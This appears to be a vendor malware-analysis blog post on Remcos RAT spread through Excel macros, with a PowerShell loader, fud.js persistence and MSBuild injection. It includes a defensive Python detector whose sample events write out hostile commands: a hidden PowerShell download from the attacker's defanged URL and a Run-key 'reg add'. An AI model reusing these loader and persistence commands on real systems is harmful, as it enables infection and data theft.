The ASEC analysis team identified that Remcos RAT malware is being distributed through malicious macros in Excel files. The team has previously covered the malware in detail in the post linked below. While the method of entering the system through spam mails is the same as before, it should be noted that the Remcos RAT malware is ultimately delivered filelessly after passing through multiple loader stages.
In summary, the overall operation method is as follows:
The attacker attaches Excel files containing malicious macros to e-mails for distribution. When the macro is executed, it uses PowerShell to download a JS file and additional data. Afterward, the Remcos RAT malware is run by being injected into the legitimate Windows process MSBuild.exe.
The spam mail tells the reader not to reply, as it is an automated message, and asks the reader to check and open the attached file. There are cases where Remcos RAT malware is distributed directly as an attachment, but in this case the attacker used a macro in an Excel file to download it.
Opening the attached Excel file shows that it is not much different from other malicious Excel macro files. However, because the macro code in Figure 5 uses values from cells A5, A6, and A7, we can assume that the attacker intentionally hid column A (see Figure 3).
The VBA macro code first uses the Hyperlinks function on the data in cells A5, A6, and A7. Then, to execute the system command, the macro uses the ShellExecute method of the Shell Application object (cell A7) to run the data in cell A5 with “P” + owershell (the cell A6 data in reverse order).
Decoding the data in cell A5, which is ultimately executed via PowerShell in the VBA code, gives the result shown in the figure above. With the PowerShell window set to hidden, the macro downloads the JS file from hxxp://192.227.158[.]111/fud.js, saves it in the %APPDATA% path under the filename fud.js, and runs the file.
The fud.js file can be roughly divided into two parts. The following lists the notable traits of the code.
1) Maintain persistence (cmd.exe)
● Copies the JS file to the %APPDATA% (Roaming) path and registers it in the Run registry key.
● reg_key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lol
● reg_value: C:\Users\[user name]\AppData\Roaming\fud.js
2) Load binary (powershell.exe)
● AMSI (Anti-Malware Scan Interface) Bypass
● Test-Connection cmdlet
Performs a connection test to google.com to check whether the PC is connected to a network.
● Download additional malicious data
Downloads a string from the external URL (hxxp://vendorcreditglobal[.]online/file/dino.jpg).
From the PE signature 4D5A (MZ) shown in the small black box in Figure 10, we can assume that a PE file will be loaded later. The PE file is the first object found within the PowerShell code, a DLL file in .NET form. The second object is a gzip-compressed file, and inside the gzip data is the Remcos RAT malware.
The function ‘[YESS]::f77df00sd’ found in the last part of Figure 11 injects into the legitimate process MSBuild.exe and loads the first object, the .NET binary, which in turn executes the second object, the Remcos RAT malware.
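The process chain described above (Excel spawning PowerShell, a JS file dropped to %APPDATA% and registered under the Run key, and PowerShell spawning MSBuild.exe with no project file) can be checked in endpoint telemetry. The following detection logic is an added example written for this post, not code from ASEC or from the malware; the events are constructed Sysmon-style records, and the assumption that fud.js is run by wscript.exe is ours, since the post does not name the script host.

```python
"""Flag the Remcos loader chain in constructed process-creation events (added example)."""
import re

OFFICE = ("excel.exe", "winword.exe", "powerpnt.exe")
SCRIPT_HOSTS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe")
# reg add ... \CurrentVersion\Run ... <something>.js  (the fud.js persistence step)
RUN_KEY_JS = re.compile(r"reg\s+add\s+.*\\currentversion\\run\b.*\.js", re.I)
# a .js file being written into the roaming AppData path
JS_TO_APPDATA = re.compile(r"\.js.*(%appdata%|\$env:appdata|\\appdata\\roaming)", re.I)
PROJECT_ARG = re.compile(r"\.(proj|sln|csproj)\b", re.I)

# Constructed sample events, not real telemetry. User name and PIDs are invented.
EVENTS = [
    {"pid": 10, "ppid": 1,  "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": "EXCEL.EXE invoice.xlsm"},
    {"pid": 11, "ppid": 10, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"""powershell -w hidden (New-Object Net.WebClient).DownloadFile('hxxp://192.227.158[.]111/fud.js',"$env:APPDATA\fud.js")"""},
    {"pid": 12, "ppid": 11, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\AppData\Roaming\fud.js"},
    {"pid": 13, "ppid": 12, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v lol /d "C:\Users\alice\AppData\Roaming\fud.js" /f'},
    {"pid": 14, "ppid": 12, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc AAAA"},
    {"pid": 15, "ppid": 14, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe"},
    {"pid": 20, "ppid": 1,  "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd /c dir"},  # benign
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (pid, rule_name) pairs for every event matching one of the chain's stages."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        img, cmd = basename(e["image"]), e["cmdline"]
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        if pimg in OFFICE and img in SCRIPT_HOSTS:          # macro launching a script host
            findings.append((e["pid"], "office_spawns_script_host"))
        if img == "powershell.exe" and JS_TO_APPDATA.search(cmd):  # JS dropped to %APPDATA%
            findings.append((e["pid"], "powershell_drops_js_to_appdata"))
        if RUN_KEY_JS.search(cmd):                            # Run key pointing at a .js file
            findings.append((e["pid"], "run_key_points_to_js"))
        if img == "msbuild.exe" and pimg in SCRIPT_HOSTS and not PROJECT_ARG.search(cmd):
            findings.append((e["pid"], "msbuild_without_project_from_script_host"))
    return findings

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"pid {pid}: {rule}")
```

Each rule on its own is noisy on developer machines (MSBuild.exe in particular), so a practitioner would correlate the hits by PID lineage rather than alert on any single one.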
The Remcos used in this attack was found to be the latest version, released on June 18th.
As the packet capture shown above indicates, RST packets are received when the malware attempts to connect to the Remcos C2 server. When the server is online, the malware will likely exfiltrate data collected by the keylogger and perform additional functions.
Users should refrain from opening emails from unknown sources and should not run or enable macros when opening attachment files. If the security level of the document program is set to low, macros may run automatically without any notification. Therefore, users should set the security level to high to prevent unintended features from running.
Also, users are advised to update the anti-malware engine pattern to its latest version.
AhnLab’s anti-malware product, V3, detects and blocks the malicious files introduced in this post using the aliases below.
twistednerd.dvrlists[.]com (Remcos RAT C2)
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.